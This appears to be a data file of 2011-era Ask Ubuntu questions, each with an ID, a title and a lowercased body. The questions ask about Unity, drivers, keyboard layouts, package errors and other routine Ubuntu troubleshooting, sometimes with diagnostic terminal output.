35742	how to disable gtk-theme in covergloobus ?	i installed covergloobus in ubuntu 11.04 natty narwhal . but when i start covergloobus . it is handled like an opened appliciation . there is still a titlebar . how can i disable the gtk-theme ?
35743	kubuntu and windows 7 dual boot , clock time changes automatically	i had windows 7 installed , and i set my pc clock to a specific time . it worked fine but then i also installed kubuntu ( now its a dual boot ) . whenever i run kubuntu my clock changes time by -4 hours and when i again run windows its time too has changed . so every time i set my clock in windows , kubuntu changes it by -4hrs and this also effects my windows clock any help ?
35744	discover whether a program is installed from python3 script	within my python3 software i need to check to see if git is installed . i know that from the terminal i can type : dpkg -- get-selections > filename to find what programs are installed and then put that into a file . from there , how would i get python to see if git is installed ? or is there an easier way ?
35745	hard drive partitioning	i have a question : is there a `` correct '' way to configure the partitions on my hard drive for an ubuntu installation ? i have a 250gb disk and now i have the following partitions : ( partitions in this order on my hdd . ) 50gb ( ext4 ) file system mount point / 180gb ( ntfs ) personal files 4gb ( swap ) i have a toshiba a200-21t laptop and i would like to have the best performance and stability possible with ubuntu . so far , i have no grievances with the installation i have , but , i 'm a new ubuntu user and i wonder if this hard drive configuration is correct . thanks .
35757	where are the new desktop & server features documented ?	when a new edition is coming out , i always find the new features in detail . not only there is unity and cloud support , in much more detail , like sometimes fedora used to tell when a release coming out . new softwares , new services , solutions , many things what is changed or debut in that particular release . i search it on www.ubuntu.com , and other sites , but did n't found . is there any detailed announcement about new features ?
35758	where is the netboot image ?	i wanted to ask that i used the netboot image from the ubuntu 10.04 server for pxe booting ubuntu 10.04 desktop edition as i did n't find the netboot folder in the ubuntu 10.04 desktop edition the netboot image boot normally retrieves and parses the unattended file but later go in error while trying to download installer component . also can anyone post a link where i can find the netboot folder for ubuntu 10.04 desktop edition ?
35759	how do i set another search directory for wallpapers ?	i keep all my documents on a separate drive from my ubuntu installation , and i have a folder full of nice wallpapers on that drive . how can i make ubuntu automatically search this directory so wallpapers show up in the wallpaper changer dialogue , reached from right clicking on the desktop and selecting change desktop wallpaper ? edit : i 've tried putting a symlink in the /usr/share/backgrounds folder to the other drive and that did n't work .
35761	how do i get to which window i am hovering over ?	in ubuntu 11.04 , in workspace when i press super w shortcut , i get to multiple i opened in a workspace , when i am moving over from one window to other , how do i know the title very clearly
35764	are there any existing apps similar to gnome 3 's chat popup/respond box ?	in general , i prefer unity to gnome shell , but the latter 's chat popup and inline responder thing ( video here : http : //www.youtube.com/watch ? v=lepxx1kdelo ) is more or less a killer app for me and is the only thing preventing me from switching to unity . are there any existing apps/plugins that offer similar functionality that can be used in unity ?
35770	enable overlay scrollbars in all applications	is there a way to force all applications to use the natty overlay scrollbars ? examples : chrome does n't use it , neither does firefox , gnome-terminal or a host of other applications .
35777	multi-server setup for windows clients with ubuntu servers	i need a simple server setup for a client , and have used ubuntu for them for some years as a simple combined login server and fileserver . we now need to change to using two separate servers . so was wondering what the process was to have a setup where : users log in to their win7 and winvista machines using domain accounts hosted on ubuntu they can map a drive to a share on an ubuntu server without logging on again what i think i need is a couple of pointers to the types of tech i 'm looking for here - i 'm currently only using pure samba for the pdc behaviour .
35778	which keyboard setting corresponds to `` united states ( international ) '' in windows xp	i 'm running both ubuntu ( 10.04 ) and winxp on the same machine , thus using the same keyboard . on windows i have selected `` united states ( international ) '' as my keyboard setting . in ubuntu i have `` usa international ( altgr dead keys ) '' . however , they work slightly different . when i press the [ `` ] -key ( or the [ ' ] -key ) in windows , the resulting character depends on the next typed character . for example i can get foreign characters like `` ăš '' and `` ăť '' . when i press the [ `` ] -key in ubuntu , it just displays a `` character , thus not allowing me to get special characters . i prefer the windows version , but do n't know how to get this done in ubuntu . here 's a few screenshots to show you in case i failed to explain : windows : ubuntu ( same key sequence ) :
35779	what does `` cp : omitting directory '' mean ?	i 've issued the following command : sudo cp ~/transfers/zendframework-1.11.4-minimal/library/zend/* ~/public_html/cmsk.dev/library/ when i do this , i start getting the following messages : cp : omitting directory `tag ' cp : omitting directory `test ' cp : omitting directory `text ' cp : omitting directory `timesync ' cp : omitting directory `tool ' cp : omitting directory `translate ' cp : omitting directory `uri ' cp : omitting directory `validate ' and so on ... why do i get these messages ?
35783	remap caps lock key to 'run command ' ( alt+f2 )	i 'm trying to get rid of the caps lockkey and give it a better use . since i constantly use the run command alt+f2 , i 'd like to make caps lock trigger that action . i 've found a couple of questions related , using xmodmap , but none of them try to map caps lock to a combination of keys such as alt+f2 how would i go about doing this ? thanks !
35787	how do you pin your favorite apps to the dash ?	how pin your favorite apps to the dash ? eg replacing firefox - explore the web ( `` explorar la web '' ) with opera in the initial dash ( when pressing the super key - windows key ) yet it must be officially implemented in natty help text appears in gray : desktop help âťoverview > applications and windows '' `` pin your favorite apps to the dash ''
35788	is there any easy way in unity to add shortcuts to the desktop ?	in gnome you can right click a menu item and add to desktop . ca n't seem to find a just-as-simple alternative in unity ? anyone know ?
35789	how to change cursor in unity ?	as we have to have active compiz with unity , i ca n't change the color , size , etc . of the cursor . is there any way for do it ?
35797	creating custom tasksel recipes	i 'd like to create custom tasks for tasksel - is there any way to do this , like creating a package for ubuntu , only it 's for tasksel ?
35798	ubuntu 11.04 does n't distinguish between audio outputs ?	my pc has two audio 3.5mm audio outputs : back - used for speaker system front - used for headset this is my audio controller : id : multimedia description : audio device product : n10/ich 7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver = hda intel latency = 0 resources : irq : 44 memory : fea78000-fea7bfff the problem is that up to ubuntu 10.10 i could right click the speaker symbol in notification area and switch between : analog headphones ( sound only over headphones ) analog output ( sound on both headphones and speaker system ) this was very convinient because i didnt always have to shut down the speaker system if i only wanted to use headphones . any idea what caused this change and how to fix it ?
35800	how to change to a specific openoffice document in unity ?	imaging i have three opened documents in openoffice writer and i want to go to one of them , in stardard gnome i would have three applications in the bottom panel each with their correspondent name . in dockbarx , hovering the mouse would show me each of the three documents . now in unity if i click in the launcher will take me to one of the documents , i suppose is taking me to the last one i was editing or reading , and then i have to click in the window menu to choose a different document ( this workflow is very inefficient ) . i was n't able to figure out the way of going to a specific document . could somebody help me ?
35802	ubuntu 10.04 ldap replication	ubuntu 10.04 ldap replication - please help i was trying to setup ldap replication . but i put the wrong ip address in the consumer_sync.ldif file and now i am trying to fix it but i am getting the following error ; please help me out ! jsmith @ s2rweb2 : /var/nfs $ sudo ldapadd -c -y external -h ldapi : /// -f consumer_sync.ldif sasl/external authentication started sasl username : gidnumber=0+uidnumber=0 , cn=peercred , cn=external , cn=auth sasl ssf : 0 modifying entry `` cn=module { 0 } , cn=config '' ldap_modify : type or value exists ( 20 ) additional info : modify/add : olcmoduleload : value # 0 already exists modifying entry `` olcdatabase= { 1 } hdb , cn=config '' ldap_modify : type or value exists ( 20 ) additional info : modify/add : olcdbindex : value # 0 already exists
35803	dvorak layout with qwerty hotkeys ( dvorak â qwerty ctrl )	how can i use qwerty hotkeys with the dvorak keyboard layout ? for example i want c to map to j , but ctrl + c to remain as ctrl + c. the dvorak-qwerty program is supposed to do this , but does not work for me . desired behaviour seems to occur in the terminal and with foreign language layouts .
35808	indicator app not showing wireless networks	i thought i would try out the new ubuntu 11.04 beta on my laptop today . when i went to look for the driver to my wireless card it was listed in the `` additional drivers '' app just like it was in ubuntu 10.10 . the problem i am having now is the indicator applet is not showing me anything about my wifi card . when i click on it all i see is `` auto eth0 '' . i realize that this is a beta . but any idea where i might be able to fidn the problem ? i am guessing a misconfiguration somewhere . any help would be appreciated . the wireless card ( from lspci -nn ) : 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11 b/g wlan [ 14e4:4311 ] ( rev 01 )
35811	my .odb database spikes the cpu in openoffice and libreoffice	my database is in .odb format , and it does not work in 9.1 , 10.04 , 10.10 , openoffice or 11.04 beta libreoffice but works in xp , w7 and fedora 14 the biggest issue i 'm facing is that it takes minutes to move from one record to another spiking the processor at 100 % . i tested this on 3 different machines and they exhibit the same behavior .
35813	environment variables from /etc/environment not propagated to child process ?	i 'm having a problem . i have set an environment variable in /etc/environment using boost_librarydir= '' /usr/local/lib/boost/release '' . echo $ boost_librarydir correctly echoes the value to the terminal . however , if i execute echo $ boost_librarydir in a script using ./test.sh it shows the env variable as empty . as i understand it , it should be set also for child processes ?
35815	shortcut to hide libnotify	i was wondering if it is possible to make an shortcut to hide all those notify bubbles ( libnotify ) for some time . why i'am ask this ? because sometimes i want to see something , read or even show and page for someone and those bubbles bother a little bit . so if it is possible , will be really cool : ) thanks : )
35820	extend the ubuntu disk space that was installed beside windows 7 without reinstalling	i have installed ubuntu 10.10 inside windows from ubuntu cd with 12 gb space . how could i increase the disk space to 20 gb with out reinstalling ubuntu ?
35824	how to change the command of the application launcher in docky ?	i 've dragged the application launcher from main menu to the docky panel . now , i want to change the command that starts the application ( i need to add some arguments ) . i can change it the main menu using editor . how to change it in the docky launcher ? does docky store the launcher files somewhere so they can be edited ? i am using docky 2.2.0 ( bzr docky r1807 ppa ) on ubuntu 10.10
35828	can i get the ip from another computer connected to my ubuntu one account ?	can i get the ip from another computer connected to my ubuntu one account ? i know that i can have this with dyndns but being able to get the ip of every computer connected to my ubuntu account is easier than creating one more account on another site and configuring yet another daemon ... .
35830	installing pyqt4 for python3	i am trying to get my code running using python3 and pyqt4 . when i do this : gruszczy @ gruszczy-laptop : ~/programy/fathom/tools $ python3.1 fathomqt.py traceback ( most recent call last ) : file `` fathomqt.py '' , line 5 , in < module > from pyqt4.qtcore import ( qfilesystemmodel , qdir , signal , qt ) importerror : /usr/lib/python3/dist-packages/sip.so : undefined symbol : pyunicodeucs4_comparewithasciistring i have installed sip and pyqt4 by hand in both /usr/lib/python3/dist-utils and /usr/lib/python3.1/dist-packages , but neither helped . i have libpython3.1 as well as python3.1-dev and both packages for 3.2 either . what am i missing ? i am using natty beta , but i do n't believe this is a problem , since it 's now quite stable on my machine .
35832	webgl is not initializing properly ?	i 've the latest stable versions of firefox and chrome . but when i run bodybrowser i get the following error : google body uses webgl , a new standard for 3d on the web . your browser supports webgl , but webgl is not initializing properly how can i get this to work ?
35833	any open source data analysis software around ?	are the any apps for analysing data like spss , minitab etc in windows for ubuntu ?
35841	how to leave only the icon in the me menu ?	i have a question , is it possible to display only the icon in me menu ? it is interesting , since i do not see much utility that contain the name , and let the cleaner look . i realized that only appears in os elementary icon . so is it possible ? thanks ! ! ! sorry my bad english , i am brazilian ; ) elementary os icon : ubuntu 10.10 - me menu :
35843	where does the mod4+p key binding come from ?	on my laptop ( toshiba portege r705 ) the mod4+p key combination toggles between different display modes : single monitor , mirror display , and extended display . i would like to disable this binding , because it can be annoying when pressed by accident . moreover , there is already the fn+f5 hardware key with the same functionality , so the binding probably comes from software . unfortunatelly , i can not find anything related in the keyboard shortcuts .
35845	multi-threaded file copier ?	i am looking for a multi-threaded file copy program . the reason i 'm interested in mult-threading is that i have 240 gb of files ( most being pretty small ) i need to transfer . in windows land there is robocopy , richcopy , teracopy , etc . in linux i ca n't seem to find any tool that can do this . is there any tool you all are aware of that does multi-threaded file copying ?
35846	are there any guis for mysql ? what is recommended ?	i am looking for a mysql gui for ubuntu 11.04 . i am looking for one with a feature set comparable to sqlyog for windows . does anyone have any recommendations ? i have tried mysql tools bundle mysql workbench and hated them both ...
35855	how to get logitech m305 wheel tilting to work as forward/backward ?	i have the mouse specified in the title . at the moment when i tilt the wheel left/right it works as horizontal scrolling ( which i do not use at all ) . i would like it to work as backward/forward buttons ( for example in firefox ) . for windows there are drivers which allow these events ' mapping to be changed . i have n't found any drivers for linux . is it possible to change it somehow ?
35861	indicator-weather does n't work	for the past couple days can not indicator-weather on the panel ? what can i do to make it back on the panel . but i can see it in system monitor and it 's sleeping .
35863	how to make global menu always shown on unmaximized window in unity ?	user do n't need to hover top panel to see application menus . but if application maximized , user need to hover top panel to see it 's menus ( like current unity behavior ) . thanks
35864	which usb wifi dongles support ad-hoc mode out of the box ( without installing additional drivers ) ?	which usb wifi dongles support ad-hoc mode on ubuntu 10.10 out of the box ( without installing additional drivers ) ? i am having difficulty finding usb wifi dongle which supports ad-hoc mode . i would like to find well supported model with drivers already included in ubuntu .
35869	why ca n't files be renamed by using f2 on the open files dialog screen ?	why is it not possible to edit file names in the open file window dialogues ? for instance , by pressing f2 ( as per example on libreoffice open document window dialogue ) . this is very useful and windows has does this for a long time ( it 's just necessary to select one file and press f2 ... ) gnome just allows this on the desktop and nautilus windows ( why these windows are not based on nautilus ? )
35870	what recent netbooks , as of april 2011 , are known to work properly with ubuntu ?	i 'm looking for netbooks that work properly with ubuntu , i.e . do n't have wireless problems , graphics problems , touchpad problems etc . ideally these would be netbooks that have come out recently , and first-hand experience is best , though links to detailed information are okay as well . resources like ubuntu-certified hardware seem quite out of date -- i 'm looking for recent ubuntu-friendly netbooks .
35871	left button - > send to ... ( no option to send the file as an attachment using evolution )	ubuntu 11.04 beta 2 : selecting a file and clicking left button ( on the mouse ) and then selecting `` send to '' ... ( no option to send the file as an attachment on evolution ) on the previous version this was working , why not now ?
35876	the panel date/time applet does n't show the evolution agenda 's events	ubuntu 11.04 classic desktop beta 2 : when the user click ( unrolls ) the applet located on the top panel ( date/time/weather ) does n't show the evolution calendar events . ( it shows just the time and locations ) on the previous ubuntu 's version , to see this ( agenda events ) was possible , why not now ?
35879	how do i force wubi to download and install 32 bit version ?	i am trying to install ubuntu natty beta 2 32bit with wubi , but whenever i try to install it always tries to download 64 bit version . how do i ensure that it downloads 32 bit instead of 64 bit ?
35885	can i unlock mac folders from a usb stick ?	i use a macbook . the folders appear to be locked with a lock icon ( like music , video etc. ) . the folders like documents seem to be working fine . i ca n't do anything on my mac as it is not booting but i need to take the data out of it . can i do it from a ubuntu live usb stick ?
35886	wubi installation	i have downloaded ubuntu beta 2 for installation . but cant get it right cause installation goes inside windows with wubi and when restarting fails to continue and i 'm using benq joybook 7000 please cause it has been like these from the alpha releases while 10.04 was working pretty i must say it had to disable req 11 first , i 'm afraid the final release might not work too . any help is welcomed .
35887	different docks on different workspaces , or configure awn to behave differently on different workspaces	i would like to have different settings for the dock behavior for different workspaces , or more likely i would like the dock that i use now , awn ( avant window navigator ) to show up in just 3 of the four workspaces i have . so the question is : can i run different instances of awn one on each workspace or can i run it just on one work space and maybe use something else like cario for the next workspace . any ideas ?
35890	how to programmatically swap the caps lock and esc keys ?	i am a heavy vim user and one of the first things i do when i start working on a clean ubuntu installation is to swap the caps lock and esc keys to reduce hand movements over the keyboard . so far i have been doing it through the keyboard configuration dialog , but i am now writting a set of scripts that will set ubuntu up the way i like and i have not been able to find a scriptable or programmable way to change this configuration item . i am not looking for options that swap the keys at any other level than gnome itself , so what i am looking for is for a way to script this change and have it appear in the keyboard configuration that i used to use , should i decide to revert it manually in the future .
35891	how can i install texmaker 3 ?	when trying to install texmaker 3 in ubuntu 11.04 with the package available with the 32bit package at http : //www.xm1math.net/texmaker/download.html i get the following error : preparing to replace texmaker 2.2.1-1ubuntu1 ( using ... /texmaker_ubuntu_11.04_3.0.1_i386.deb ) ... unpacking replacement texmaker ... dpkg : error processing /home/ingo/downloads/texmaker_ubuntu_11.04_3.0.1_i386.deb ( -- install ) : trying to overwrite '/usr/share/texmaker/doc12.png ' , which is also in package texmaker-data 2.2.1-1ubuntu1 dpkg-deb ( subprocess ) : data : internal gzip write error : broken pipe dpkg-deb ( subprocess ) : failed in write on buffer copy for failed to write to pipe in copy : broken pipe dpkg-deb : error : subprocess < decompress > returned error exit status 2 processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for python-support ... i tried to use sudo gdebi ... as a workaround , but that did not work . how can i install texmaker otherwise ?
35893	migrate apps from ubuntu to fedora	hi i have ubuntu on my machine with several apps installed and lots of configurations made , but i want to test fedora 15 ( when it comes ) . the problem is that i dont want ( and cant ) install same apps on fedora using internet ( main problem is bandwidth ) , and also i dont have the time to make the same configurations to fedora . is there any way to migrate apps to fedora + conf files ? thanx in advance ; - )
35898	how to use 12voip.com ( betamax ) sip service for calling and sendingsms ?	could anyone help me with configuring any linux softphones for use with sip betamax services ? in windows , i was using 12voip.com to make calls and send sms . however i have failed to correctly configure linphone and ekiga so far . all the instructions in internet seem to relate to old versions of ekiga . i have also tried the original 12voip ( betamax ) client with wine , it installs , runs but fails to log in . thanks , guys ! @ administrators : please , replace the 'software-recommendation ' with some reasonable tags ( e.g . betamax , sip , softphone ) to this question . i can not create tags yet .
35905	where have my panel applets gone in natty ?	this might be a bug but it might just be an undocumented `` feature '' . i 'm asking because i want to know . edit : this is now also filed as a bug . edit : here 's a strace of gnome-panel . upgraded to natty from maverick today with the intention of keeping my panel-based gnome2 setup . i 've already asked if that 's possible and it does appear that 's the case . my problem is on loading the panels , i get a ton of errors from very default applets like the window list , notification area and clock . upon further investigation , i do n't appear to be able to even add these types of applet . they 're missing from the add to panel dialogue . is there a package i need to install to get these applets back ? here 's what i see on boot :
35906	project hamster time traker , lack of unity support	i used to use the hamster time tracker . it is a wonderful application , easy to use and simple . however , with the move to unity , it does not work properly due to the lack of integration . are there any plans to integrate this tool to unity ?
35914	free software for interactive panoramas ?	is there any free software to create interactive panoramas ( 360ยบ , like this one ) in ubuntu ? edit : i would need not only a way to create a static panorama ( i.e , a jpg file , for instance ) , but also a way to convert it to some interactive format ( swf , mov ... . ) or some way to implement it in a web page so that it can be panned , rotated , etc . ( zoomed would also be nice , but is not strictly required ) .
35917	how to recursively remove .svn metadata folders ?	i have a java project and it used a svn repository , now i decide to change to git . however the problem is that svn engine that i used created in every folder of the project the .svn metadata directory . i want to clean all folders of the project of this hidden folder . is there any terminal command to search in folder and clean it ?
35920	checking laptop 's battery state in a terminal	i want to find out whether my laptop is plugged in to ac power or not using the command line . how can i do this ?
35922	how to change extension of multiple files from command line ?	i have many files with .abc extension and want to change them to .edefg how to do this from command line ? edit : i have a root folder with many sub-folders , so the solution should work -r recursively .
35925	upgrading from ubuntu 10.10 to kubuntu 11.04	how can i upgrade from ubuntu 10.10 to kubuntu 11.04 ( beta 2 ) ? also , how much problems should i expect in the beta ?
35928	ruby ide for ubuntu	i am in search of a light-weight ror ide for ubuntu . netbeans is good but bulky for a beginner . same is true with eclipse . is there any simple ide which is also free ?
35932	suspending ubuntu using terminal	how can i suspend ubuntu using the terminal ? can i schedule it to `` wake up '' ? another thing that i wanted to know is whether processes like downloads continue to run when ubuntu is suspended ?
35934	how do i install the reddit unity lens ?	so i was looking at jorge castro 's blog , and i saw that there was a reddit lens for ubuntu 11.04 unity . how do i install it ? is there a ppa ?
35940	how do i set time for use on a server where microseconds are important ?	lets say you have a server that stores records , and the time stamp that goes into the mysql/postgres/text-file/whatever is vital to be accurate ( lets pretend it 's a physics experiment , or bank transaction auditing system ) . my server 's always end up out of time bit by bit each day ( this may be due to existinging inside a vm ? ) . i can run ntpdate every day , manually , which is a total pain , but i dont want to do that , and have a feeling it may not be a good solution at all for high precision time tracking . what should i do to ensure my computer is never off by more than 0.05 seconds ? i want to be able to walk away from it for 5 years and have it running accurate time when i come back . note : this is ubuntu-server , cli commands only , there is no gui .
35944	ca n't get ipv6 address using dhcp	i can get the ipv4 address using dhcp , but ca n't get the ipv6 address . the dhcp server also support the ipv6 service . ifconfig eth0 eth0 link encap : ethernet hwaddr : 00:21:85 : d3 : a3:36 inet addr:10.16.31.183 broadcast:10.16.31.255 netmask:255.255.255.0 inet6 addr : fe80 : :221:85ff : fed3 : a336/64 scope : link up broadcast running multicast mtu:1500 metric:1 other configurations about ipv6 : pwd : /proc/sys/net/ipv6/conf/all disable_ipv6 = 0 ; forwarding = 1 ; autoconf = 1 ; is there any solution for solving this problem ?
35945	xine always starts muted	i 'm suffering from the issue that xine is always starting up muted so that i have to manually increase the volume . i tried all options ( with configuration experience level set to maximum ) . the startup audio volume is set to 60 % and tried with restore volume level at startup both enabled and disabled as well as all other settings i could find . this started already quite a while ago , i think with ubuntu 8.04 and seems to be caused by pulseaudio . removing ~/.pulse helps and xine starts up non-muted once but further starts are muted again after the directory is recreated . it links to the /tmp folder which is a tmpfs ram disk , so it is deleted at every reboot , but this does n't this happens on two installations on quite different computers ( acer aspire 7720g laptop and dell omniplex 745 ) . i 'm using the normal xine v0.99.6 and running ubuntu 10.10 64bit . i tried googling it several times in the last two years but never found anything relevant . i thought it might be caused by an old wrongly updated pulseaudio config file , but it also happens with a fresh installation . the home directory is the same , but i deleted all pulseaudio related user config files i could find and this did n't changed anything . deleting ~/.xine does n't change anything apart of the xine config window popping up at the first start afterwards . running pulseaudio -k will make xine start officially muted ( volume at 0 % ) but with normal sound !
35948	sitecom wireless network usb micro adapter problem	i have problem with sitecom wireless network usb micro adapter 300n wl-364 . i use ubuntu 10.10 64bit and it does not recognize any drivers for this model . what i did so far : used ndiswrapper to install drivers from windows' updated the kernel in ndiswrapper i have some improvements . at least ubuntu recognize the adapter . but when it comes to scan , it just freezed and i had to restart pc . how can i solve my problem ? thank you
35950	how to determine the partition on which ubuntu is installed and resize it ?	i have four partitions on my hard-drive : c , e , f and g. partitions c and g are ntfs and i installed ubuntu using wubi through windows 7 . probably i installed it on the partition g , where windows 7 is also installed . i guess i created a new partition within g for ubuntu and it was a minimum 3.5 gb installation . from ubuntu , i want to check on which partition i installed it and how much space is left . how to do this ? i also want to install any ubuntu package that can resize the partition by taking the free space from another partition .
35951	how to make the unity launcher to be transparent ?	how to make the unity launcher to be transparent ?
35955	how to hide hard disk size in volume name ?	how to hide hard disk size in volume name ? i just want to show volume name alone .
35956	how to determine the size of a package while using apt prior to downloading ?	when using apt-get install < package_name > , and there are dependencies that need to be downloaded , the terminal outputs names of additional packages and total size , and asks for confirmation before downloading . but , when dependencies are satisfied and nothing but the named package needs to be downloaded there is no size output and no confirmation . when using synaptic , i can see the total size that new packages that will use after installation but no way to see the size that needs to be downloaded , except to go from package to package and use properties to see the compressed size . i would like to know if there is a way to see the size of a package ( s ) in terminal and synaptic prior to downloading and installing it/them ?
35963	how to make the unity launcher always visible ?	is there a possibility to make unity dock always visible on the left ? its current behaviour - hiding and showing , drives me insane : )
35968	multi screen problems `` virtual size does not fit available size ''	i recently upgraded to 11.04 beta 2 and everything works just like clockwork , but now iâve run into multi screen issues : / at first it worked but then a installed the proprietary drivers ( i think this is causing it ) and now its coming up with this virtual size restrictions and only lets me mirror screen or use just one . its like its limiting me on how much total resolution i can have if you get what i mean . i hope thereâs a work around for this ... this is what is says when i try enable my second monitor . the selected configuration for displays could not be applied required virtual size does not fit available size : requested= ( 2646 , 1024 ) , minimum= ( 320 , 200 ) , maximum= ( 1366,1366 )
35971	create live wallpaper slideshow that changes based on date rather than duration	i 'm trying to create a live wallpaper slideshow that will display a specific image for every day of the year . effectively a live desktop calendar . i 've seen the question how do i create a desktop wallpaper slideshow ? , but i want to ask something more specific : how can i specify displaying a specific image on a specific date ? for instance , is there an `` isdate '' boolean operator i can use here ? or is there some way i could hack the < starttime > section to make it display a specific image by date ? or is there a better way to do this ?
35976	ca n't copy highlighted text from tomboy to thunderbird ( or other apps )	not sure why but i can only copy text from tomboy notes to gedit and then re-highlight and copy in to the app i need the text in . i am guessing this is a simple issue of config and not a real problem . any help greatly appreciated .
35977	touchpad two finger sensivity problem	having asked about touchpad not only once but twice . i have again come back to same topic : d. basically i have a working two finger scrolling after adding the following line in /etc/profile after i enabled two finger scrolling in touchpad section of mouse . xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger pressure '' 32 40 but my touchpad sensitivity quite irritates me as it jumps around sometimes and also behaves scrolling as well as right click on single finger sometimes . anyone can suggest me any tips to minimize this if not avoid ? anyone know if i could use pinch zoom ( finally got the right term : ) ) as my touchpad says it supports such activity as well ? thanks in advance .
35989	broadcom bcm4312 wireless card does not work in 11.04 but did ( out of the box ) in 10.10	here 's my card : 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) when i try to install the broadcom sta wireless drivers through 'additional drivers ' , it says `` installation failed '' and tells me to look in /var/logs/jockey.log . what can i do about it ? also , how can the ubuntu devs be informed of this ? it 's not like i 'm running it on some obscure machine . it 's an hp pavilion laptop . everything worked fine in maverick .
35991	how do i determine what packages require a certain library ?	i currently have a bunch of kde libraries installed on my computer , and i want to find out what packages i have installed that require them . does any one know a quick way to do this ? i 'd prefer a command line solution , but a gui one is fine as well .
35992	how can i debug panel applets ?	so i 've got an issue with natty 's gnome 2 panels . short story : most of the panel applets are either missing or crashing out . something 's unhappy and i ca n't work out what or why . so how do you get debugging information from a gnome-panel and its applets ? is there a log file somewhere , or a method of starting it so that it does leave a log file ?
35998	gnome-do sometimes stops responding to superkey+spacebar	this seems to be on a random basis . any ideas on what could cause this ? ( sorry for the lack of detail - it really does seem to be random )
36000	how to stop tor from starting before vidalia ?	i get these errors trying to run tor with vidalia apr 19 21:55:15.371 [ notice ] tor v0.2.1.30 . this is experimental software . do not rely on it for strong anonymity . ( running on linux i686 ) apr 19 21:55:15.372 [ notice ] initialized libevent version 1.4.13-stable using method epoll . good . apr 19 21:55:15.373 [ notice ] opening socks listener on 127.0.0.1:9050 apr 19 21:55:15.373 [ warning ] could not bind to 127.0.0.1:9050 : address already in use . is tor already running ? apr 19 21:55:15.373 [ warning ] failed to parse/validate config : failed to bind one of the listener ports . apr 19 21:55:15.373 [ error ] reading config failed -- see warnings above . i do n't think tor is running . here is a nmap scan of my localhost starting nmap 5.21 ( http : //nmap.org ) at 2011-04-19 21:59 cest nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.0000050s latency ) . hostname localhost resolves to 2 ips . only scanned 127.0.0.1 rdns record for 127.0.0.1 : localhost.localdomain not shown : 989 closed ports port state service 22/tcp open ssh 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 631/tcp open ipp 3128/tcp open squid-http 3306/tcp open mysql 9000/tcp open cslistener 9050/tcp open tor-socks 10000/tcp open snet-sensor-mgmt i see tor-socks is running here , probably be the cause of the problem . how do i stop this from starting up ? i want to use vidalia so i can monitor whats going on .
36003	sync banshee with ubuntu one music without having the music locally ?	is it possible to set up banshee to sync with my ubuntu one music that is stored in the cloud ? if i upload all my music to ubuntu one from my desktop , will i then be able to sync banshee with that cloud and play all my music on my laptop , without having to `` download '' all the music to my laptop ? can banshee handle the cloud music as if it was stored locally ?
36008	how to use loose focus feature of xserver ?	i want one window to loose mouse focus ( its a game , and alt-tab doesnt work as it should ) . there is this interesting commit that i reached with searching and reading , but dont know how to use deagrb feature . http : //cgit.freedesktop.org/~daniels/xserver/commit/ ? h=input-next & id=ff4efa75fba16c099295b0cc6a5b9e44386b8427 edit1 : there are some applications ( games mostly ) which exclusively grab mouse focus , and if you press alt-tab , your mouse focus wont switch to another window , i want to force such applications to release all focus they have , i think that allowdeactivategrabs config var in x server should have similar effect , but it is deprecated ... edit2 : @ poolie , no it is not duplicate question , it is releated , but definetely not duplicate
36009	dependecies not met -- language-selector	uri @ uri-ms-7267 : ~ $ lang=c sudo dpkg -- configure -a [ sudo ] password for uri : setting up language-selector-common ( 0.6.7 ) ... dpkg : error processing language-selector-common ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of language-selector : language-selector depends on language-selector-common ( = 0.6.7 ) ; however : package language-selector-common is not configured yet . dpkg : error processing language-selector ( -- configure ) : dependency problems - leaving unconfigured processing triggers for python-central ... errors were encountered while processing : language-selector-common language-selector why am i getting this ? happened after i updated today .
36011	how do you handle unity freezes ?	this is a question in general . sometimes when using natty , the interface freezes like the keyboard works but the mouse does respond . in which case pressing ctrl+alt+f1 puts me at the terminal . however i do not know how to load the gui and unity and continue using ubuntu . at present i just shutdown properly and restart . i have no expertise in this regard , which is probably why some of the terms i use could be wrong . please correct me if necessary . how do i restart the xserver or gui ( gnome and unity ) when i press ctrl+alt+f1 ?
36020	how can i make 'man ' more gui friendly ?	when i type man bash it shows the info in the terminal itself . how do i tell `` man '' to open up the info in gedit instead ? is this possible ?
36025	how can i return from a new release to an older-release ?	i really do n't like 11.04 . is there any way to revert back to 10.10 ?
36029	how do i make a theme have square instead of round windows ?	how can i make my favorite theme ( i.e , orta ) have square instead of rounded window corners ?
36035	is there a file system best suited for a torrent partition ?	following on from an excellent answer provided by user gilles , i 'd like to ask whether there 's a file system particularly well-suited for fairly heavy torrent use . soon i 'll be setting up an ubuntu box with : / [ ext4 ] /home [ ext4 ] /media/data [ ext4 ] /media/torrents [ ? ] normally i 'd make the /media/torrents partition ext4 without considering other options . however , in light of the information linked to above , perhaps there 's a better alternative . the proposed /media/torrents partition will be read and written to 24/7 but will only ever reach ~85 % of the partition 's capacity .
36036	using external monitor with laptop monitor as separate monitors	i am trying to use 32 '' lcd monitor with my ubuntu 10.10 installation . i am trying to use my laptop screen and external monitor at the same time but having two separate desktops . i also want to use my laptop with 1280x800 resolution and external one with 1920 x 1080 using vga . however , ubuntu sees my external lcd as a crt and provide 13 ... .x ... resolution at the best not above . my graphics card driver is nvidia 270 ... . driver . is ubuntu capable of using two monitors separately or should i give up ? thank you
36038	how can i remove the top panel in unity ?	i want to keep the unity launcher only and remove the panel . is there a way to do that ?
36042	who can attend uds ?	i live near hungary ( slovakia ) , so it is n't a big trip to came to budapest uds . but i do n't know who can attend this event . everyone ? or just the community members ? is it needs to register somewhere ? and if i have n't rent a room yet , can i rent it the grand hotel ( how much it is ? ) , or it is only for members ?
36046	is it possible to colorize permissions-part of the output of `ls` ?	in the rwx permissions that are listed by ls -l , is it possible to put the first set of rwx in red , the next in blue and the third in green ? for example , is the following possible :
